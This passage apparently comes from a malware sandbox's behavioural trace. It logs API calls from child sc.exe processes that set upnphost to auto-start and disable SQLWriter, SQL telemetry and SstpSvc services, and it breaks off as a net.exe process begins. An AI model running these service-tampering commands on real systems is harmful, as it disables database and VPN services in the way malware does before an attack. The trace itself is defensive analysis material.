lpLoadOrderGroup=0x0, lpdwTagId=0x0, lpDependencies=0x0, lpServiceStartName=0x0, lpPassword=0x0, lpDisplayName=0x0 | out: lpdwTagId=0x0) returned 1 [0084.544] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x64, dwLanguageId=0x0, lpBuffer=0x1efc00, nSize=0x2, Arguments=0x1efc0c | out: lpBuffer="㲸'ﲌ\x1e䋒\x08ᡜ\x08༄F\x01") returned 0x22 [0084.545] GetFileType (hFile=0x37c) returned 0x3 [0084.545] LocalAlloc (uFlags=0x0, uBytes=0x44) returned 0x273d50 [0084.545] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="[SC] ChangeServiceConfig SUCCESS\r\n", cchWideChar=34, lpMultiByteStr=0x273d50, cbMultiByte=68, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[SC] ChangeServiceConfig SUCCESS\r\n", lpUsedDefaultChar=0x0) returned 34 [0084.546] WriteFile (in: hFile=0x37c, lpBuffer=0x273d50, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x1efbf0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1efbf0, lpOverlapped=0x0) returned 0 [0084.546] LocalFree (hMem=0x273d50) returned 0x0 [0084.546] LocalFree (hMem=0x273cb8) returned 0x0 [0084.546] LocalFree (hMem=0x0) returned 0x0 [0084.546] CloseServiceHandle (hSCObject=0x26ff00) returned 1 [0084.546] CloseServiceHandle (hSCObject=0x26ffa0) returned 1 [0084.768] exit (_Code=0) Thread: id = 103 os_tid = 0x974 Process: id = "16" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x3858000" os_pid = "0x6c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"sc.exe\" config upnphost start= auto" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 93 os_tid = 0x34c [0084.488] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcf894 | out: lpSystemTimeAsFileTime=0xcf894*(dwLowDateTime=0xc9c5f30, dwHighDateTime=0x1d6f0d1)) [0084.488] GetCurrentProcessId () returned 0x6c8 [0084.488] GetCurrentThreadId () returned 0x34c [0084.488] GetTickCount () returned 0x114b462 [0084.488] QueryPerformanceCounter (in: lpPerformanceCount=0xcf88c | out: lpPerformanceCount=0xcf88c*=20358910660) returned 1 [0084.488] GetModuleHandleA (lpModuleName=0x0) returned 0x80000 [0084.489] __set_app_type (_Type=0x1) [0084.489] __p__fmode () returned 0x770331f4 [0084.489] __p__commode () returned 0x770331fc [0084.489] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x879c7) returned 0x0 [0084.489] __wgetmainargs (in: _Argc=0x89020, _Argv=0x89028, _Env=0x89024, _DoWildCard=0, _StartInfo=0x89034 | out: _Argc=0x89020, _Argv=0x89028, _Env=0x89024) returned 0 [0084.489] SetThreadUILanguage (LangId=0x0) returned 0x409 [0084.492] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0084.492] GetStdHandle (nStdHandle=0xfffffff5) returned 0x37c [0084.492] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0084.492] _wcsicmp (_String1="config", _String2="query") returned -14 [0084.492] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0084.492] _wcsicmp (_String1="config", _String2="start") returned -16 [0084.492] _wcsicmp (_String1="config", _String2="pause") returned -13 [0084.492] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0084.492] _wcsicmp (_String1="config", _String2="control") returned -14 [0084.492] _wcsicmp (_String1="config", _String2="continue") returned -14 [0084.492] _wcsicmp (_String1="config", _String2="stop") returned -16 [0084.492] _wcsicmp (_String1="config", _String2="config") returned 0 [0084.492] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x5dffa8 [0084.494] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0084.494] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0084.494] _wcsicmp (_String1="auto", _String2="boot") returned -1 [0084.494] _wcsicmp (_String1="auto", _String2="system") returned -18 [0084.494] _wcsicmp (_String1="auto", _String2="auto") returned 0 [0084.494] OpenServiceW (hSCManager=0x5dffa8, lpServiceName="upnphost", dwDesiredAccess=0x3) returned 0x5dff08 [0084.495] QueryServiceConfig2W (in: hService=0x5dff08, dwInfoLevel=0x3, lpBuffer=0xcf77c, cbBufSize=0x4, pcbBytesNeeded=0xcf770 | out: lpBuffer=0xcf77c, pcbBytesNeeded=0xcf770) returned 1 [0084.495] ChangeServiceConfigW (in: hService=0x5dff08, dwServiceType=0xffffffff, dwStartType=0x2, dwErrorControl=0xffffffff, lpBinaryPathName=0x0, lpLoadOrderGroup=0x0, lpdwTagId=0x0, lpDependencies=0x0, lpServiceStartName=0x0, lpPassword=0x0, lpDisplayName=0x0 | out: lpdwTagId=0x0) returned 1 [0084.508] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x64, dwLanguageId=0x0, lpBuffer=0xcf728, nSize=0x2, Arguments=0xcf734 | out: lpBuffer="㲸^\x0c䋒\x08ᡜ\x08༄\x15\x01") returned 0x22 [0084.509] GetFileType (hFile=0x37c) returned 0x3 [0084.509] LocalAlloc (uFlags=0x0, uBytes=0x44) returned 0x5e3d50 [0084.509] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="[SC] ChangeServiceConfig SUCCESS\r\n", cchWideChar=34, lpMultiByteStr=0x5e3d50, cbMultiByte=68, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[SC] ChangeServiceConfig SUCCESS\r\n", lpUsedDefaultChar=0x0) returned 34 [0084.509] WriteFile (in: hFile=0x37c, lpBuffer=0x5e3d50, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0xcf718, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xcf718, lpOverlapped=0x0) returned 0 [0084.509] LocalFree (hMem=0x5e3d50) returned 0x0 [0084.510] LocalFree (hMem=0x5e3cb8) returned 0x0 [0084.510] LocalFree (hMem=0x0) returned 0x0 [0084.510] CloseServiceHandle (hSCObject=0x5dff08) returned 1 [0084.510] CloseServiceHandle (hSCObject=0x5dffa8) returned 1 [0084.767] exit (_Code=0) Thread: id = 102 os_tid = 0x814 Process: id = "17" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x7a15d000" os_pid = "0x314" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"sc.exe\" config SQLTELEMETRY start= disabled" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 94 os_tid = 0x5c4 [0084.579] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ff7f4 | out: lpSystemTimeAsFileTime=0x2ff7f4*(dwLowDateTime=0xca84610, dwHighDateTime=0x1d6f0d1)) [0084.579] GetCurrentProcessId () returned 0x314 [0084.579] GetCurrentThreadId () returned 0x5c4 [0084.579] GetTickCount () returned 0x114b4b0 [0084.579] QueryPerformanceCounter (in: lpPerformanceCount=0x2ff7ec | out: lpPerformanceCount=0x2ff7ec*=20368026807) returned 1 [0084.580] GetModuleHandleA (lpModuleName=0x0) returned 0x80000 [0084.580] __set_app_type (_Type=0x1) [0084.580] __p__fmode () returned 0x770331f4 [0084.580] __p__commode () returned 0x770331fc [0084.580] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x879c7) returned 0x0 [0084.580] __wgetmainargs (in: _Argc=0x89020, _Argv=0x89028, _Env=0x89024, _DoWildCard=0, _StartInfo=0x89034 | out: _Argc=0x89020, _Argv=0x89028, _Env=0x89024) returned 0 [0084.580] SetThreadUILanguage (LangId=0x0) returned 0x409 [0084.583] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0084.583] GetStdHandle (nStdHandle=0xfffffff5) returned 0x37c [0084.583] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0084.583] _wcsicmp (_String1="config", _String2="query") returned -14 [0084.583] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0084.583] _wcsicmp (_String1="config", _String2="start") returned -16 [0084.583] _wcsicmp (_String1="config", _String2="pause") returned -13 [0084.583] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0084.583] _wcsicmp (_String1="config", _String2="control") returned -14 [0084.583] _wcsicmp (_String1="config", _String2="continue") returned -14 [0084.583] _wcsicmp (_String1="config", _String2="stop") returned -16 [0084.583] _wcsicmp (_String1="config", _String2="config") returned 0 [0084.583] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x6affc0 [0084.585] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0084.585] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0084.585] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0084.585] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0084.585] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0084.585] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0084.585] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0084.585] OpenServiceW (hSCManager=0x6affc0, lpServiceName="SQLTELEMETRY", dwDesiredAccess=0x3) returned 0x0 [0084.586] GetLastError () returned 0x424 [0084.586] _itow (in: _Dest=0x424, _Radix=3143276 | out: _Dest=0x424) returned="1060" [0084.586] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x89380, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0084.587] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x2ff654, nSize=0x2, Arguments=0x2ff660 | out: lpBuffer="ᥘk￿￿/ᔰ\x08/鎀\x081060") returned 0x62 [0084.587] GetFileType (hFile=0x37c) returned 0x3 [0084.587] LocalAlloc (uFlags=0x0, uBytes=0xc4) returned 0x6b32b8 [0084.588] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="[SC] OpenService FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n", cchWideChar=98, lpMultiByteStr=0x6b32b8, cbMultiByte=196, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[SC] OpenService FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n", lpUsedDefaultChar=0x0) returned 98 [0084.588] WriteFile (in: hFile=0x37c, lpBuffer=0x6b32b8, nNumberOfBytesToWrite=0x62, lpNumberOfBytesWritten=0x2ff644, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ff644, lpOverlapped=0x0) returned 0 [0084.588] LocalFree (hMem=0x6b32b8) returned 0x0 [0084.588] LocalFree (hMem=0x6b1958) returned 0x0 [0084.588] LocalFree (hMem=0x0) returned 0x0 [0084.588] CloseServiceHandle (hSCObject=0x6affc0) returned 1 [0084.770] exit (_Code=1060) Thread: id = 105 os_tid = 0x624 Process: id = "18" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x78c62000" os_pid = "0x5a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"sc.exe\" config SQLTELEMETRY$ECWDB2 start= disabled" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 95 os_tid = 0x270 [0084.558] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ffdf4 | out: lpSystemTimeAsFileTime=0x1ffdf4*(dwLowDateTime=0xca5e4b0, dwHighDateTime=0x1d6f0d1)) [0084.558] GetCurrentProcessId () returned 0x5a8 [0084.558] GetCurrentThreadId () returned 0x270 [0084.558] GetTickCount () returned 0x114b4a0 [0084.558] QueryPerformanceCounter (in: lpPerformanceCount=0x1ffdec | out: lpPerformanceCount=0x1ffdec*=20365933667) returned 1 [0084.559] GetModuleHandleA (lpModuleName=0x0) returned 0x80000 [0084.559] __set_app_type (_Type=0x1) [0084.559] __p__fmode () returned 0x770331f4 [0084.559] __p__commode () returned 0x770331fc [0084.559] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x879c7) returned 0x0 [0084.559] __wgetmainargs (in: _Argc=0x89020, _Argv=0x89028, _Env=0x89024, _DoWildCard=0, _StartInfo=0x89034 | out: _Argc=0x89020, _Argv=0x89028, _Env=0x89024) returned 0 [0084.559] SetThreadUILanguage (LangId=0x0) returned 0x409 [0084.562] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0084.562] GetStdHandle (nStdHandle=0xfffffff5) returned 0x37c [0084.562] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0084.562] _wcsicmp (_String1="config", _String2="query") returned -14 [0084.562] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0084.562] _wcsicmp (_String1="config", _String2="start") returned -16 [0084.562] _wcsicmp (_String1="config", _String2="pause") returned -13 [0084.562] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0084.562] _wcsicmp (_String1="config", _String2="control") returned -14 [0084.562] _wcsicmp (_String1="config", _String2="continue") returned -14 [0084.562] _wcsicmp (_String1="config", _String2="stop") returned -16 [0084.562] _wcsicmp (_String1="config", _String2="config") returned 0 [0084.562] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x5affd0 [0084.564] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0084.564] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0084.564] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0084.564] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0084.564] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0084.564] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0084.564] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0084.564] OpenServiceW (hSCManager=0x5affd0, lpServiceName="SQLTELEMETRY$ECWDB2", dwDesiredAccess=0x3) returned 0x0 [0084.565] GetLastError () returned 0x424 [0084.565] _itow (in: _Dest=0x424, _Radix=2096236 | out: _Dest=0x424) returned="1060" [0084.565] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x89380, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0084.567] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x1ffc54, nSize=0x2, Arguments=0x1ffc60 | out: lpBuffer="ᥠ[￿￿ﵰ\x1fᔰ\x08ﱬ\x1f鎀\x081060") returned 0x62 [0084.567] GetFileType (hFile=0x37c) returned 0x3 [0084.567] LocalAlloc (uFlags=0x0, uBytes=0xc4) returned 0x5b32c0 [0084.567] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="[SC] OpenService FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n", cchWideChar=98, lpMultiByteStr=0x5b32c0, cbMultiByte=196, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[SC] OpenService FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n", lpUsedDefaultChar=0x0) returned 98 [0084.568] WriteFile (in: hFile=0x37c, lpBuffer=0x5b32c0, nNumberOfBytesToWrite=0x62, lpNumberOfBytesWritten=0x1ffc44, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1ffc44, lpOverlapped=0x0) returned 0 [0084.568] LocalFree (hMem=0x5b32c0) returned 0x0 [0084.568] LocalFree (hMem=0x5b1960) returned 0x0 [0084.568] LocalFree (hMem=0x0) returned 0x0 [0084.568] CloseServiceHandle (hSCObject=0x5affd0) returned 1 [0084.769] exit (_Code=1060) Thread: id = 104 os_tid = 0xa14 Process: id = "19" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x1467000" os_pid = "0x67c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"sc.exe\" config SQLWriter start= disabled" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 96 os_tid = 0x90 [0084.650] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef804 | out: lpSystemTimeAsFileTime=0x2ef804*(dwLowDateTime=0xcb42cf0, dwHighDateTime=0x1d6f0d1)) [0084.650] GetCurrentProcessId () returned 0x67c [0084.650] GetCurrentThreadId () returned 0x90 [0084.650] GetTickCount () returned 0x114b4fe [0084.650] QueryPerformanceCounter (in: lpPerformanceCount=0x2ef7fc | out: lpPerformanceCount=0x2ef7fc*=20375113261) returned 1 [0084.650] GetModuleHandleA (lpModuleName=0x0) returned 0x80000 [0084.651] __set_app_type (_Type=0x1) [0084.651] __p__fmode () returned 0x770331f4 [0084.651] __p__commode () returned 0x770331fc [0084.651] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x879c7) returned 0x0 [0084.651] __wgetmainargs (in: _Argc=0x89020, _Argv=0x89028, _Env=0x89024, _DoWildCard=0, _StartInfo=0x89034 | out: _Argc=0x89020, _Argv=0x89028, _Env=0x89024) returned 0 [0084.651] SetThreadUILanguage (LangId=0x0) returned 0x409 [0084.654] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0084.654] GetStdHandle (nStdHandle=0xfffffff5) returned 0x37c [0084.654] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0084.654] _wcsicmp (_String1="config", _String2="query") returned -14 [0084.654] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0084.654] _wcsicmp (_String1="config", _String2="start") returned -16 [0084.654] _wcsicmp (_String1="config", _String2="pause") returned -13 [0084.654] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0084.654] _wcsicmp (_String1="config", _String2="control") returned -14 [0084.654] _wcsicmp (_String1="config", _String2="continue") returned -14 [0084.654] _wcsicmp (_String1="config", _String2="stop") returned -16 [0084.654] _wcsicmp (_String1="config", _String2="config") returned 0 [0084.654] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x3cffb8 [0084.656] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0084.656] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0084.656] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0084.656] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0084.656] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0084.656] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0084.656] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0084.656] OpenServiceW (hSCManager=0x3cffb8, lpServiceName="SQLWriter", dwDesiredAccess=0x3) returned 0x0 [0084.656] GetLastError () returned 0x424 [0084.656] _itow (in: _Dest=0x424, _Radix=3077756 | out: _Dest=0x424) returned="1060" [0084.656] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x89380, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0084.657] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x2ef664, nSize=0x2, Arguments=0x2ef670 | out: lpBuffer="᥈=￿￿.ᔰ\x08.鎀\x081060") returned 0x62 [0084.657] GetFileType (hFile=0x37c) returned 0x3 [0084.657] LocalAlloc (uFlags=0x0, uBytes=0xc4) returned 0x3d32a8 [0084.657] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="[SC] OpenService FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n", cchWideChar=98, lpMultiByteStr=0x3d32a8, cbMultiByte=196, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[SC] OpenService FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n", lpUsedDefaultChar=0x0) returned 98 [0084.657] WriteFile (in: hFile=0x37c, lpBuffer=0x3d32a8, nNumberOfBytesToWrite=0x62, lpNumberOfBytesWritten=0x2ef654, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ef654, lpOverlapped=0x0) returned 0 [0084.658] LocalFree (hMem=0x3d32a8) returned 0x0 [0084.658] LocalFree (hMem=0x3d1948) returned 0x0 [0084.658] LocalFree (hMem=0x0) returned 0x0 [0084.658] CloseServiceHandle (hSCObject=0x3cffb8) returned 1 [0084.772] exit (_Code=1060) Thread: id = 107 os_tid = 0x954 Process: id = "20" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x7886c000" os_pid = "0x5e0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"sc.exe\" config SstpSvc start= disabled" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 97 os_tid = 0x848 [0084.614] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x27f81c | out: lpSystemTimeAsFileTime=0x27f81c*(dwLowDateTime=0xcaf6a30, dwHighDateTime=0x1d6f0d1)) [0084.614] GetCurrentProcessId () returned 0x5e0 [0084.614] GetCurrentThreadId () returned 0x848 [0084.614] GetTickCount () returned 0x114b4de [0084.614] QueryPerformanceCounter (in: lpPerformanceCount=0x27f814 | out: lpPerformanceCount=0x27f814*=20371459580) returned 1 [0084.614] GetModuleHandleA (lpModuleName=0x0) returned 0x80000 [0084.614] __set_app_type (_Type=0x1) [0084.614] __p__fmode () returned 0x770331f4 [0084.614] __p__commode () returned 0x770331fc [0084.614] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x879c7) returned 0x0 [0084.614] __wgetmainargs (in: _Argc=0x89020, _Argv=0x89028, _Env=0x89024, _DoWildCard=0, _StartInfo=0x89034 | out: _Argc=0x89020, _Argv=0x89028, _Env=0x89024) returned 0 [0084.615] SetThreadUILanguage (LangId=0x0) returned 0x409 [0084.617] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0084.617] GetStdHandle (nStdHandle=0xfffffff5) returned 0x37c [0084.617] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0084.618] _wcsicmp (_String1="config", _String2="query") returned -14 [0084.618] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0084.618] _wcsicmp (_String1="config", _String2="start") returned -16 [0084.618] _wcsicmp (_String1="config", _String2="pause") returned -13 [0084.618] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0084.618] _wcsicmp (_String1="config", _String2="control") returned -14 [0084.618] _wcsicmp (_String1="config", _String2="continue") returned -14 [0084.618] _wcsicmp (_String1="config", _String2="stop") returned -16 [0084.618] _wcsicmp (_String1="config", _String2="config") returned 0 [0084.618] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x30ffa8 [0084.620] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0084.620] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0084.620] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0084.620] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0084.620] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0084.620] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0084.620] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0084.620] OpenServiceW (hSCManager=0x30ffa8, lpServiceName="SstpSvc", dwDesiredAccess=0x3) returned 0x30ff08 [0084.620] QueryServiceConfig2W (in: hService=0x30ff08, dwInfoLevel=0x3, lpBuffer=0x27f704, cbBufSize=0x4, pcbBytesNeeded=0x27f6f8 | out: lpBuffer=0x27f704, pcbBytesNeeded=0x27f6f8) returned 1 [0084.621] ChangeServiceConfigW (in: hService=0x30ff08, dwServiceType=0xffffffff, dwStartType=0x4, dwErrorControl=0xffffffff, lpBinaryPathName=0x0, lpLoadOrderGroup=0x0, lpdwTagId=0x0, lpDependencies=0x0, lpServiceStartName=0x0, lpPassword=0x0, lpDisplayName=0x0 | out: lpdwTagId=0x0) returned 1 [0084.634] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x64, dwLanguageId=0x0, lpBuffer=0x27f6b0, nSize=0x2, Arguments=0x27f6bc | out: lpBuffer="㲸1'䋒\x08ᡜ\x08༄#\x01") returned 0x22 [0084.635] GetFileType (hFile=0x37c) returned 0x3 [0084.635] LocalAlloc (uFlags=0x0, uBytes=0x44) returned 0x313d50 [0084.635] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="[SC] ChangeServiceConfig SUCCESS\r\n", cchWideChar=34, lpMultiByteStr=0x313d50, cbMultiByte=68, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[SC] ChangeServiceConfig SUCCESS\r\n", lpUsedDefaultChar=0x0) returned 34 [0084.635] WriteFile (in: hFile=0x37c, lpBuffer=0x313d50, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x27f6a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x27f6a0, lpOverlapped=0x0) returned 0 [0084.635] LocalFree (hMem=0x313d50) returned 0x0 [0084.635] LocalFree (hMem=0x313cb8) returned 0x0 [0084.635] LocalFree (hMem=0x0) returned 0x0 [0084.635] CloseServiceHandle (hSCObject=0x30ff08) returned 1 [0084.635] CloseServiceHandle (hSCObject=0x30ffa8) returned 1 [0084.771] exit (_Code=0) Thread: id = 106 os_tid = 0x324 Process: id = "21" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x78c76000" os_pid = "0xa48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = 